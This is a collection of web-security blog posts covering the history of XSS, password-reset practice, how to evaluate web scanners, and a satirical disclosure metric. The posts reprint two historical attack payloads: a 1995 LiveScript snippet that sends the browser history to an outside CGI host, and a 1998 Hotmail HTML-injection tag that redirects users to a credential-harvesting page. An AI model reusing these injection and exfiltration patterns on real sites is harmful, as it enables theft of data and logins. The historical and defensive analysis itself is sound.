Primordial cross-site scripting (XSS) exploits

The Hacking Web Apps book covers HTML Injection and cross-site scripting (XSS) in Chapter 2. Within the restricted confines of the allotted page count, it describes one of the most pervasive attacks that plagues modern web applications.

Yet XSS is old. Very, very old. Born in the age of acoustic modems barely a Planck Era after the creation of the web browser.

Early descriptions of the attack used terms like “malicious HTML” or “malicious JavaScript” before the phrase “cross-site scripting” became canonized by the OWASP Top 10. While XSS is an easy point of reference, the attack could be more generally called HTML injection because an attack does not have to “cross sites” or rely on JavaScript to be successful. The infamous Samy attack didn’t need to leave the confines of MySpace (nor did it need to access cookies) to effectively DoS the site within 24 hours. And persistent XSS is just as dangerous if an attacker injects an iframe that points to a malware site — no JavaScript required.

Here’s one of the earliest references to the threat of XSS from a message to the comp.sys.acorn.misc newsgroup on June 30, 19961. It mentions only a handful of possible outcomes:

Another ‘application’ of JavaScript is to poke holes in Netscape’s security. To *anyone* using old versions of Netscape before 2.01 (including the beta versions) you can be at risk to malicious Javascript pages which can
a) nick your history
b) nick your email address
c) download malicious files into your cache *and* run them (although you need to be coerced into pressing the button)
d) examine your filetree.

From that message we can go back several months to the announcement of Netscape Navigator 2.0 on September 18, 1995. A month later Netscape created a “Bugs Bounty” starting with its beta release in October. The bounty offered rewards, including a $1,000 first prize, to anyone who discovered and disclosed a security bug within the browser. A few weeks later the results were announced and first prize went to a nascent JavaScript hack.

The winner of the bug hunt, Scott Weston, posted his find to an Aussie newsgroup. This was almost 15 years ago on December 1, 1995 (note that LiveScript was the precursor to JavaScript):

The “LiveScript” that I wrote extracts ALL the history of the current netscape window. By history I mean ALL the pages that you have visited to get to my page, it then generates a string of these and forces the Netscape client to load a URL that is a CGI script with the QUERY_STRING set to the users History. The CGI script then adds this information to a log file.

Scott, faithful to hackerdom tenets, included a pop-culture reference2 in his description of the sensitive data extracted about the unwitting victim:

– the URL to use to get into CD-NOW as Johnny Mnemonic, including username and password.
– The exact search params he used on Lycos (i.e. exactly what he searched for)
– plus any other places he happened to visit.

HTML injection targets insecure web applications. These were examples of how a successful attack could harm the victim rather than how a web site was hacked. Browser security is important to mitigate the impact of such attacks, but a browser’s fundamental purpose is to parse and execute HTML and JavaScript returned by a web application — a dangerous prospect when the page is laced with malicious content inserted by an attacker. The attack is almost indistinguishable from a modern payload. A real attack might only have used a more subtle <img> or <iframe> as opposed to changing the location.href:

<SCRIPT LANGUAGE="LiveScript">
i = 0
yourHistory = ""
while (i < history.length) {
  yourHistory += history[i]
  i++;
  if (i < history.length) yourHistory += "^"
}
location.href = "http://www.tripleg.com.au/cgi-bin/scott/his?"+yourHistory
<!-- hahah here is the hidden script --></i></SCRIPT>

The actual exploit reflected the absurd simplicity typical of XSS attacks. They often require little effort to create, but carry a significant impact. This differs greatly from binary exploits (e.g. heap and buffer overflows) that require days, weeks, or months to develop.

Before closing let’s take a tangential look at the original $1,000 “Bugs Bounty”. Today, the Chromium team offers $500 and $1,3373 rewards for security-related bugs. The Mozilla Foundation offers $500 and a T-Shirt.

On the other hand, you can keep the security bug from the browser developers and earn $10,000 and a laptop for a nice, working exploit.

Come to think of it…those options seem like a superior hourly rate to writing a book. And I cringe at the difference if you compare rates based on word count.

—–
1 Netscape Navigator 3.0 was already available in April of the same year.
2 Good luck tracking down the May 1981 issue of Omni Magazine in which William Gibson‘s short story first appeared!
3 No, the extra $337 isn’t the adjustment for inflation from 1995, which would have made it $1,407.72 according to the Bureau of Labor and Statistics. It’s one of those numbers that, if you have to ask, you risk exposing yourself as a n00b. Don’t ask about that one either.

(Updated links.)
(Updated to refer to the new book and add supporting details for the term “HTML Injection” vs. XSS.)

The alien concept of password security

A post on Stack Overflow1 seeks advice on the relative security between implementing a password reset mechanism that emails a temporary link vs. one that emails a temporary password. The question brings to mind some issues addressed in Chapter 5: Breaking Authentication Schemes of The Book. Stack Overflow questions typically attract high quality answers, which is a testament to the site’s knowledgeable readership and reputation system. Responses to this particular post didn’t fail.

Rather than retread the answers, let’s consider the underlying implication behind the question: it can be acceptable to send passwords via email.

Don’t do it. Don’t give users the expectation that passwords might be sent via email. Doing so is unnecessary and establishes a dangerous practice as possibly acceptable. If the site ever sends a password to a user, then the user might be conditioned to communicate in the other direction. An email purportedly from the site’s administrators might ask for the user’s password to “verify the account is active”, “prevent the account from being terminated”, or “restore information”. The email need not ask for a direct response. It may be an indirect prompt for the password using cautionary, concerned language that never the less sends the victim to a spoofed login page.

Site administrators will not elicit passwords via email or any other means. Sites won’t ask for passwords except at authentication barriers. Sites shouldn’t send passwords — however temporary they may be.

“Newt. My name’s Newt.”

Passwords — shared secrets ostensibly known only to the user and the web site — are a necessary evil of authentication. The password proves a user’s identity to a web site under the assumption that only the person who logs in as Newt, for example, knows the corresponding password to the account is rebecca.

A password’s importance to web security has a frustratingly indirect relationship to the amount of control a site is able to exert over its protection. Users must be trusted not only to use hard-to-guess words or phrases, but must be trusted not to share the password or otherwise actively divulge it through accident or ignorance. Only the luckiest of potential victims will click an emailed link and be brought to a friendly page:

“That’s it man, game over man, game over!”

Password reuse among sites poses another serious risk. The theft of a user’s credentials (email address and password) for a site like http://www.downloadwarez.free might seen relatively innocuous, but what if they’re the same credentials used for allof.my.friends or http://www.mostly.secure.bank? Even worse, what if the password matches the one for the Gmail, Hotmail, or Yahoo account? In that case: Nuke the entire site from orbit. It’s the only way to be sure.”

“Seventeen days? Hey man, I don’t wanna rain on your parade, but we’re not gonna last seventeen hours!”

Use random, temporary links for password reset mechanisms via email. By this point you should be sufficiently warned off of the alternative of emailing temporary passwords. An obstinate few might choose to stick with passwords, arguing that there’s no difference between the two once they hit the unencrypted realm of email.

Instead, use a forward-thinking solution that tries to secure the entire reset process:

  • Maintain the original password until the user changes it. Perhaps they’ll remember it anyway. This also prevent a mini-denial of service where attackers force users to change their passwords.
  • Use a strong pseudo-random number generator to minimize the chance of success of brute force attacks guessing the link.
  • Expire the link after a short period of time, perhaps in minutes or hours. This narrows the window of opportunity for brute force attacks that attempt to guess links. It’s no good to let an attacker initiate a password reset on a Friday evening and have a complete weekend to brute force links until the victim notices the e-mail on a Monday morning.

“Maybe we got ’em demoralized.”

For those of you out there who visit web sites rather than create them there’s one rule you should never ignore. If the site’s password recovery mechanism emails you the original password for your account, then stop using the site. Period. Full stop. Should you be forced to use the site under threat of violence or peer pressure, whichever is worse, at the very least choose a password that isn’t shared with any other account. Storing unencrypted passwords is lazy, bad security design, and a liability.

—–
1 Huzzah! A site name that doesn’t succumb to stripping spaces, prefixing an ‘e’ or ‘i’, or using some vapid, made-up word only because it consists of four or five letters!
2 Quotes from the movie Aliens. If you didn’t already know that stop reading and go watch it now. We’ll wait. See you in about two hours.

Web Scanner Evaluation: Accuracy

This is the first in a series of essays describing suggested metrics for evaluating web application security scanners.

Accuracy measures the scanner’s ability to detect vulnerabilities. The basic function of a web scanner is to use automation to identify the same, or most of the same, vulnerabilities as a web security auditor. Rather than focus on the intricate details of specific vulnerabilities, this essay describes two major areas of evaluation for a scanner: its precision and faults.

Precision
Precise scanners produce results that not only indicate the potential for compromise of the web site, but provide actionable information that helps developers understand and address security issues.
Comprehensive tests should be measured on the different ways a vulnerability might manifest as opposed to establishing a raw count of payloads. The scope of a test is affected by several factors:
  • Alternate payloads (e.g. tests for XSS within an href attribute or the value attribute of an input element, using intrinsic events, within a JavaScript variable, or that create new elements)
  • Encoding and obfuscation (e.g. employing various character sets or encoding techniques to bypass possible filters)
  • Applicability to different technologies in a web platform (e.g. PHP superglobals, .NET VIEWSTATE)
Robust detection mechanisms will correctly confirm the presence of a vulnerability, which typically fall into one of three categories:
  • Signatures such as HTTP response code, string patterns, and reflected content (e.g. matching ODBC errors or looking for alert(1) strings)
  • Inference based on interpreting the results of a group of requests (e.g. “blind” SQL injection that affects the content of a response based on specific SQL query constructions)
  • Time-based tests measure the responsiveness of the web site to various payloads. Not only can they extend inference-based tests, but they can also indicate potential areas of Denial of Service if a payload can cause the site to spend more resources processing a request than an attacker requires making the request (e.g. a query that performs a complete table scan of a database).
Injection vector refers to the areas that a scanner applies security tests. The most obvious injection points are query string parameters and visible form fields. The web browser should at least be considered an untrusted source if not an adversarial one. Consequently, a web scanner should be able to run security checks via all aspects of HTTP communication including:
  • URI parameters
  • POST data
  • Client-site headers, especially the ones more commonly interpreted by web sites including User-Agent, the-forever-misspelled Referer, and Cookie.
Faults
Errors in a scanner’s results take away from the time-saving gains of automation by requiring users to dig into non-existent vulnerabilities or spending too much time repeating the scanner’s tests in order to satisfy that certain vulnerabilities do not exist.
False positives indicate insufficient analysis of a potential vulnerability. The cause of a false positive can be hard to discern without intimate knowledge of the scanner’s internals, but often falls into one of these categories:
  • Misdiagnosis of generic error page or landing page
  • Poor test implementation that misinterprets correlated events to infer cause from effect (e.g. changing a profile page’s parameter value from Mike to Mary to view another user’s public information is not a case of account impersonation – the web site intentionally displays the content)
  • Sole reliance on inadequate test signature to claim the vulnerability exists (e.g. a poor regex or stating an HTTP 200 response code for ../../../../etc/passwd indicates the password file is accessible)
  • Web application goes into error state due to load (e.g. database error occurs because the server has become overloaded by scan traffic, not because a double quote character was injected into a parameter)
  • Lack of security impact (e.g. an unauthenticated, anonymous search form is vulnerable to CSRF – search engines like Google, Yahoo!, and Bing are technically vulnerable but the security relevance is questionable)
The effort expended to invalidate an erroneous vulnerability wastes time better spent investigating and verifying actual vulnerabilities. False positives also reduce trust in the scanner.
False negatives expose a more worrisome aspect of the scanner because the web site owner may gain a false sense of security by assuming, incorrectly, that a report with no vulnerabilities implies the site is fully secure. Several situations lead to a missed vulnerability:
  • Lack of test. The scanner simply does not try to identify the particular type of vulnerability.
  • Poor test implementation that too strictly defines the vulnerability (e.g. XSS tests that always contain <script> or javascript: under the mistaken assumption that those are required to exploit an XSS vuln)
  • Inadequate signatures (e.g. the scanner does not recognize SQL errors generated by Oracle)
  • Insufficient replay of requests (e.g. a form submission requires a valid e-mail address in one field in order to exploit an XSS vulnerability in another field)
  • Inability to automate (e.g. the vulnerability is related to a process that requires understanding of a sequence of steps, knowledge of the site’s business logic). The topic of vulnerabilities for which scanners cannot test (or have great difficulty testing) will be addressed separately.
  • Lack of authentication state (e.g. the scanner is able to authenticate at the beginning of the scan, but unknowingly loses its state, perhaps by hitting a logout link, and does not attempt to restore authentication)
  • Link not discovered by the scanner. This falls under the broader scope of site coverage, which will be addressed separately.
The optimistic aspect of false negatives is that a scanner’s test repository can always grow. In this case a good metric is determining the ease with which false negatives are addressed.
Summary
Accuracy is an important aspect of a web scanner. Inadequate tests might make a scanner more cumbersome to use than a simple collection of tests scripted in Perl or Python. Too many false positives reduces the user’s confidence in the scanner and wastes valuable time on items that should never have been identified. False negatives may or may not be a problem depending on how the web site’s owners rely on the scanner and whether the missed vulnerabilities are due to lack of tests or poor methodology within the scanner.
One aspect not addressed here is measuring how accuracy scales against larger web sites. A scanner might be able to effectively scan a hundred-link test application, but suffer in the face of a complex site with various technologies, error patterns, and behaviors.
Finally, accuracy is only one measure of the utility of a web application scanner. Future essays will address other topics such as site coverage, efficiency, and usability.

Observations on Larry Suto’s Paper about Web Application Security Scanners

Note: I’m the lead developer for the Web Application Scanning service at Qualys and I worked at NTO for about three years from July 2003 — both tools were included in this February 2010 report by Larry Suto. Never the less, I most humbly assure you that I am the world’s foremost authority on my opinion, however biased it may be.

The February 2010 report, Analyzing the Accuracy and Time Costs of Web
Application Security Scanners, once again generated heated discussion about web application security scanners. (A similar report was previously published in October 2007.) The new report addressed some criticisms of the 2007 version and included more scanners and more transparent targets. The 2010 version, along with some strong reactions to it, engender some additional questions on the topic of scanners in general:

How much should the ability of the user affect the accuracy of a scan?

Set aside basic requirements to know what a link is or whether a site requires credentials to be scanned in a useful manner. Should a scan result be significantly more accurate or comprehensive for a user who has several years of web security experience than for someone who just picked up a book in order to have spare paper for origami practice?

I’ll quickly concede the importance of in-depth manual security testing of web applications as well as the fact that it cannot be replaced by automated scanning. (That is, in-depth manual testing can’t be replaced; unsophisticated tests or inexperienced testers are another matter.) Tools that aid the manual process have an important place, but how much disparity should there really be between “out of the box” and “well-tuned” scans? The difference should be as little as possible, with clear exceptions for complicated sequences, hidden links, or complex authentication schemes. Tools that require too much time to configure, maintain, and interpret don’t scale well for efforts that require scanning to more than a handful of sites at a time. Tools whose accuracy correlates to the user’s web security knowledge scale at the rate of finding smart users, not at the rate of deploying software.

What’s a representative web application?

A default installation of osCommerce or Amazon? An old version of phpBB or the WoW forums? Web sites have wildly different coding styles, design patterns, underlying technologies, and levels of sophistication. A scanner that works well against a few dozen links might grind to a halt against a few thousand.

Accuracy against a few dozen hand-crafted links doesn’t necessarily scale against more complicated sites. Then there are web sites — in production and earning money no less — with bizarre and inefficient designs such as 60KB .NET VIEWSTATE fields or forms with seven dozen fields. A good test should include observations on a scanner’s performance at both ends of the spectrum.

Isn’t gaming a vendor-created web site redundant?

A post on the Accunetix blog accuses NTO of gaming the Accunetix test site based on a Referer field from web server log entries. First, there’s no indication that the particular scan cited was the one used in the comparison; the accusation has very flimsy support. Second, vendor-developed test sites are designed for the very purpose of showing off the web scanner. It’s a fair assumption that Accunetix created their test sites to highlight their scanner in the most positive manner possible, just as HP, IBM, Cenzic, and other web scanners would (or should) do for their own products. There’s nothing wrong with ensuring a scanner — the vendor’s or any other’s — performs most effectively against a web site offered for no other purpose than to show off the scanner’s capabilities.

This point really highlights one of the drawbacks of using vendor-oriented sites for comparison. Your web site probably doesn’t have the contrived HTML, forms, and vulnerabilities of a vendor-created intentionally-vulnerable site. Nor is it necessarily helpful that a scanner proves it can find vulnerabilities in a well-controlled scenario. Vendor sites help demonstrate the scanner, they provide a point of reference for discussing capabilities with potential customers, and they support marketing efforts. You probably care how the scanner fares against your site, not the vendor’s.

What about the time cost of scaling scans?

The report included a metric that attempted to demonstrate the investment of resources necessary to train a scanner. This is useful for users who need tools to aid in manual security testing or users who have only a few web sites to evaluate.

Yet what about environments where there are dozens, hundreds, or — yes, it’s possible — thousands of web sites to secure within an organization? The very requirement of training a scanner to deal with authentication or crawling works against running scans at a large scale. This is why point-and-shoot comparison should be a valid metric. (In opposition to at least one other opinion.)

Scaling scans don’t just require time to train a tool. It also requires hardware resources to manage configurations, run scans, and centralize reporting. This is a point where Software as a Service begins to seriously outpace other solutions.

Where’s the analysis of normalized data?

I mentioned previously that point-and-shoot should be one component of scanner comparison, but it shouldn’t be the only point — especially for tools intended to provide some degree of customization, whether it simply be authenticating to the web application or something more complex.

Data should be normalized not only within vulnerabilities (e.g. comparing reflected and persistent XSS separately, comparing error-based SQL injection separately from inference-based detections), but also within the type of scan. Results without authentication shouldn’t be compared to results with authentication. Other steps would be to compare the false positive/negative rates for tests scanners actual perform rather than checks a tool doesn’t perform. It’s important to note where a tools does or does not perform a check versus other scanners, but not performing a check has a different reflection on accuracy versus performing a check that still doesn’t identify a vulnerability.

What’s really going on here?

Designing a web application scanner is easy, implementing one is hard. Web security has complex problems, many of which have different levels of importance, relevance, and even nomenclature. The OWASP Top 10 project continues to refine its list by bringing more coherence to the difference between attacks, countermeasures, and vulnerabilities. The WASC-TC aims for a more comprehensive list defined by attacks and weaknesses. Contrasting the two approaches highlights different methodologies for testing web sites and evaluating their security.

So, if performing a comprehensive security review of a web site is already hard, then it’s likely to have a transitive effect on comparing scanners. Comparisons are useful and provide a service to potential customers, who want to find the best scanner for their environment, and useful to vendors, who want to create the best scanner for any environment. The report demonstrates areas not only where scanners need to improve, but where evaluation methodologies need to improve. Over time both of these aspects should evolve in a positive direction.

Earliest(-ish) hack against web-based e-mail

The book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed. Consider the following example, over a decade old, of HTML injection before terms like XSS became so ubiquitous. The exploit appeared about two years before the blanket CERT advisory that called attention to insecurity of unchecked HTML.

On August 24, 1998 a Canadian web developer, Tom Cervenka, posted a message to the comp.lang.javascript newsgroup that claimed

We have just found a serious security hole in Microsoft’s Hotmail service (http://www.hotmail.com/) which allows malicious users to easily steal the passwords of Hotmail users. The exploit involves sending an e-mail message that contains embedded javascript code. When a Hotmail user views the message, the javascript code forces the user to re-login to Hotmail. In doing so, the victim’s username and password is sent to the malicious user by e-mail.

The discoverers, in apparent ignorance of the 1990’s labeling requirements for hacks to include foul language or numeric characters, simply dubbed it the “Hot”Mail Exploit. (They demonstrated further lack of familiarity with disclosure methodologies by omitting greetz, lacking typos and failing to remind the reader of near-omnipotent skills — surely an anomaly at the time. The hacker did not fail on all aspects. He satisfied the Axiom of Hacking Culture by choosing a name, Blue Adept, that referenced pop culture, in this case the title of a fantasy novel by Piers Anthony.)

The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was co-opted by the Web 2.0 fad) that spoofed Hotmail’s login.

The attack wasn’t particularly sophisticated, but it didn’t need to be. The login form collected the victim’s login name and password then mailed them, along with the victim’s IP address, to the newly-created Geocities account.

The second step involved executing the actual exploit against Hotmail by sending an e-mail with HTML that contained a rather curious img tag:

<img src=”javascript:errurl=’http://www.because-we-can.com/users/anon/hotmail/getmsg.htm&#8217;;
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){top.submenu.document.links[i].target=’work’;
top.submenu.document.links[i].href=errurl;}noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){top.work.document.links[i].target=’work’;
top.work.document.links[i].href=errurl;}”>

The JavaScript changed the browser’s DOM such that any click would take the victim to the spoofed login page at which point the authentication credentials would be coaxed from the unwitting visitor. The original payload didn’t bother to obfuscate the JavaScript inside the src attribute. Modern attacks have more sophisticated obfuscation techniques and use tags other than the img element. The problem of HTML injection, although well known for over 10 years, remains a significant attack against web applications.

Factor of Ultimate Doom

Vulnerability disclosure presents a complex challenge to the information security community. A reductionist explanation of disclosure arguments need only present two claims. One end of the spectrum goes, “Only the vendor need know so no one else knows the problem exists, which means no one can exploit it.” The information-wants-to-be-free diametric opposition simply states, “Tell everyone as soon as the vulnerability is discovered”.

The Factor of Ultimate Doom (FUD) is a step towards reconciling this spectrum into a laser-focused compromise of agreement. It establishes a metric for evaluating the absolute danger inherent to a vulnerability, thus providing the discoverer with guidance on how to reveal the vulnerability.

The Factor is calculated by simple addition across three axes: Resources Expected, Protocol Affected, and Overall Impact. Vulnerabilities that do not meet any of the Factor’s criteria may be classified under the Statistically Irrelevant Concern metric, which will be explored at a later date.

Resources Expected
(3) Exploit doesn’t require shellcode; merely a JavaScript alert() call
(2) Exploit shellcode requires fewer than 12 bytes. In other words, it must be more efficient than the export PS1=# hack (to which many operating systems, including OS X, remain vulnerable)
(1) Exploit shellcode requires a GROSS sled. (A GROSS sled uses opcode 144 on Intel x86 processors, whereas the more well-known NOP sled uses opcode 0x90.)

Protocol Affected
(3) The Common Porn Interchange Protocol (TCP/IP)
(2) Multiple online rhetorical opinion networks
(1) Social networks

Overall Impact
(3) Control every computer on the planet
(2) Destroy every computer on the planet
(1) Destroy another planet (obviously, the Earth’s internet would not be affected — making this a minor concern)

The resulting value is measured against an Audience Rating to determine how the vulnerability should be disclosed. This provides a methodology for verifying that a vulnerability was responsibly disclosed.

Audience Rating (by Factor of Ultimate Doom*)
(> 6) Can only be revealed at a security conference
(< 6) Cannot be revealed at a security conference
(< 0) Doesn’t have to be revealed; it’s just that dangerous

(*Due to undisclosed software patent litigation, values equal to 6 are ignored.)